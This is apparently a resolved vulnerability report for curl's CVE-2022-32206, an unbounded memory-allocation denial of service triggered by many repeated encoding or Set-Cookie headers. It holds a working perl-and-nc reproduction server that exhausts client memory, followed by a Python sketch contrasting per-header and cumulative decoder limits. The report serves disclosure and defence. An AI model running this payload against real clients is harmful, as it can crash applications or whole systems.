
CVE-2022-32206: HTTP compression denial of service

Medium
C
curl
Reported by nyymi

Vulnerability Details

Technical details and impact analysis

Allocation of Resources Without Limits or Throttling
## Summary

curl does not bound resource consumption when processing certain response header types: it keeps allocating more and more memory until the application is terminated (or the system crashes, see below). The attack vectors include (at least):

- Sending many `Transfer-Encoding` headers with repeated encodings such as `gzip,gzip,gzip,...`
- If `CURLOPT_ACCEPT_ENCODING` is set, sending many `Content-Encoding` headers with repeated encodings such as `gzip,gzip,gzip,...`
- Sending many `Set-Cookie` headers with unique cookie names and values of about 4 kB each

## Steps To Reproduce

1. Run the following HTTP server:

```
perl -e 'print "HTTP/1.1 200 OK\r\n";for (my $i=0; $i < 10000000; $i++) { printf "Transfer-Encoding: " . "gzip," x 20000 . "\r\n"; }' | nc -v -l -p 9999
```

2. Run `curl http://localhost:9999`

The application terminates when it runs out of memory. On macOS the process is killed by the OOM handler:

```
Killed: 9
$ echo $?
137
```

On Linux it is the same:

```
Killed
$ echo $?
137
```

When targeting a Windows 11 system, the system would stop responding. Once the attack script was terminated, the system did not recover after 10 minutes of waiting. While it was still possible to log on to the system, the display remained black. Rebooting was necessary to return the system to a working state. This is of course likely due to bugs in the Windows operating system or drivers.

On other platforms nasty effects may also occur, such as extreme swapping or a system crash. Depending on how the system handles an application gobbling all memory, it may result in collateral damage, for example when the kernel attempts to release system resources by killing processes.

## Impact

- Uncontrolled resource consumption
- Uncontrolled application termination
- System crash (on some platforms)
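The repro above combines two things: a very long encoding list on each header line and a very large number of header lines. A cap applied to each `Transfer-Encoding` or `Content-Encoding` line in isolation stops only the first of these; a server can keep every line under the cap and still stack an unbounded number of decoders by repeating the header. The following added example (not curl's code, and not part of the original report) models that distinction with a small header parser: `per_header_check` is the pattern that the repeated-header vector defeats, `cumulative_check` counts the combined chain across all lines, and `parse_raw_headers` additionally bounds the total header block size to cover the many-large-`Set-Cookie` vector. The limit values, function names and constructed responses are assumptions for this illustration; curl's own constants may differ.

```python
"""Added example (not curl's code) modelling the flaw behind CVE-2022-32206:
a cap on the decompression chain enforced per header line can be exceeded by
sending many header lines, while a cap on the combined chain across all lines
cannot. Names, limits and the sample responses are chosen for this example.
"""
from typing import Dict, List, Tuple

# Maximum number of stacked decoders a client is willing to set up.
# The value 5 is an assumption for this example.
MAX_ENCODE_STACK = 5
# Bound on the total size of the header block, covering the "many large
# Set-Cookie headers" vector as well. 64 KiB is an arbitrary example limit.
MAX_HEADER_BYTES = 64 * 1024

# Codings that require a decoder stage (chunked and identity do not).
DECODER_CODINGS = {"gzip", "x-gzip", "deflate", "br", "zstd"}

Header = Tuple[str, str]


def parse_raw_headers(raw: str) -> List[Header]:
    """Parse a response header block (status line plus 'Name: value' lines,
    CRLF-terminated, as the perl one-liner in the report emits it). Refuses
    blocks larger than MAX_HEADER_BYTES before doing any further work."""
    if len(raw.encode()) > MAX_HEADER_BYTES:
        raise ValueError("header block exceeds MAX_HEADER_BYTES")
    headers: List[Header] = []
    for line in raw.split("\r\n")[1:]:   # element 0 is the status line
        if not line:
            break                        # empty line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def parse_coding_list(value: str) -> List[str]:
    """Split 'gzip, gzip ,chunked' into lowercase tokens, dropping empties."""
    return [t.strip().lower() for t in value.split(",") if t.strip()]


def decoders_in(value: str) -> int:
    """Number of decoder stages one header value would require."""
    return sum(1 for t in parse_coding_list(value) if t in DECODER_CODINGS)


def per_header_check(headers: List[Header], field: str) -> bool:
    """Vulnerable pattern: each header line is checked on its own, so the
    combined chain is unbounded. Returns True if the response is accepted."""
    return all(decoders_in(v) <= MAX_ENCODE_STACK
               for n, v in headers if n.lower() == field.lower())


def cumulative_check(headers: List[Header], field: str) -> bool:
    """Hardened pattern: repeated field lines are one combined list (RFC 9110),
    so the cap applies to the total chain length."""
    total = sum(decoders_in(v) for n, v in headers if n.lower() == field.lower())
    return total <= MAX_ENCODE_STACK


def build_response(lines: int, per_line: int) -> str:
    """Constructed attacker response: `lines` Transfer-Encoding headers, each
    listing `per_line` gzip steps followed by 'chunked'."""
    te = ",".join(["gzip"] * per_line) + ",chunked"
    return ("HTTP/1.1 200 OK\r\n"
            + "".join(f"Transfer-Encoding: {te}\r\n" for _ in range(lines))
            + "\r\n")


def evaluate(raw: str) -> Dict[str, bool]:
    """Run both checks on a raw header block and report what each accepts."""
    headers = parse_raw_headers(raw)
    return {
        "per_header": per_header_check(headers, "Transfer-Encoding"),
        "cumulative": cumulative_check(headers, "Transfer-Encoding"),
    }


if __name__ == "__main__":
    # Benign: one gzip step, accepted by both checks.
    print(evaluate(build_response(1, 1)))
    # Attack: 200 lines of 4 gzip steps each. Every line is under the cap, so
    # the per-header check accepts 800 stacked decoders; the cumulative
    # check rejects the response.
    print(evaluate(build_response(200, 4)))
```

The size bound in `parse_raw_headers` is deliberately separate from the chain cap: a decoder-count limit says nothing about a server that sends a few thousand distinct 4 kB `Set-Cookie` headers, so a client needs an independent ceiling on how many header bytes it will buffer for one response.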

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Allocation of Resources Without Limits or Throttling